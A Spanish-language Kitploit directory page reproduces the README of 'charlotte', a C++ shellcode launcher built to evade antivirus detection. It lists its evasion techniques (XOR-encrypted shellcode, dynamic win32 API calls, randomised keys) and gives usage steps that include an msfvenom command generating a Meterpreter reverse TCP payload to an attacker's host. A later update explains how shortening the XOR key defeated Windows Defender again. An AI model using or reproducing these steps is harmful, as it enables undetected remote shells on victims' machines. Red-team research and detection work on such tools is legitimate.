Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
charlotte — c++ lanzador de shellcode completamente no detectado ;) | Kitploit
Herramientas/GitHubGitHub/9emin1/charlotte
ExplotaciónEvasión de IDS/IPSShellcodeAnálisis de MalwarePruebas de PenetraciónRed TeamingGeneración de ShellcodeDesarrollo de PayloadsAnti-Bot
GitHub9emin1/charlotte

charlotte

c++ lanzador de shellcode completamente no detectado ;)

976207hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

charlotte

c++ lanzador de shellcode totalmente no detectado ;)

liberando esto para celebrar el nacimiento de mi recién nacido

descripción

13/05/2021:

  1. lanzador de shellcode en c++, totalmente no detectado 0/26 a fecha del 13 de mayo de 2021.
  2. invocación dinámica de funciones de la API de win32
  3. cifrado XOR del shellcode y nombres de funciones
  4. claves XOR y variables aleatorizadas por ejecución
  5. en Kali Linux, simplemente 'apt-get install mingw-w64*' ¡y listo!

17/05/2021:

  1. longitud de cadenas aleatorias y longitud de claves XOR

antiscan.me

alt_text

uso

clona el repositorio con git, genera tu archivo de shellcode con el nombre beacon.bin, y ejecuta charlotte.py

ejemplo:

  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$TU_IP LPORT=$TU_PUERTO -f raw > beacon.bin
  4. python charlotte.py
  5. beneficio

probado con msfvenom -p (mostrado en el .gif POC a continuación) y también con payload en formato raw de cobalt strike

alt_text

actualización v1.1

17/05/21:

aparentemente Microsoft Windows Defender pudo detectar el binario .DLL,

¿y cómo lo marcaron? buscando varias claves XOR de tamaño 16 bytes

cambiándolo a 9 como se muestra en el .gif POC a continuación, ahora vuelve a estar no detectado

¡saludos!

alt_text

Descargar herramienta